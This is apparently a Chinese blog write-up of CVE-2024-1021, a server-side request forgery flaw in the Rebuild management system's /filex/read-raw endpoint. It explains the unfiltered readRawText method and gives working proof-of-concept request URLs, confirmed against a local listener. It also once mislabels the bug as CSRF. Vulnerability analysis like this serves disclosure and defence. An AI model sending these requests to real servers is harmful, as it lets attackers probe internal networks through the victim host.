CVE-2024-1021 Rebuild管理系统 SSRF漏洞分析

源码官网下载

产品下载 - REBUILD下载适用于所有平台的最新版 REBUILDicon-default.png?t=N7T8https://getrebuild.com/download

漏洞接口位于包package com.rebuild.web.commons 下

 

对象FileDownloader 中有方法readRawText

在该方法中 若接收的参数filePath是url的形式,则会调用OkHttpUtils.get 方法 发起url请求 

没有发现相关过滤参数 SSRF漏洞成立

漏洞测试

访问url

http://ip:18080/filex/read-raw?url=http://baidu.com&cut=1

此时发现 用户端跳转到了baidu.com, 这也证明CSRF漏洞存在

那有个问题 你怎么证明请求是服务端发起的而不是客户端!

各位看官 请看下图 , 本地监听4444端口,构造url GET /filex/read-raw?url=http://192.168.116.128:4444&cut=1 HTTP/1.1。看看接受到了谁的请求

毫无疑问 是服务端发起的请求。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值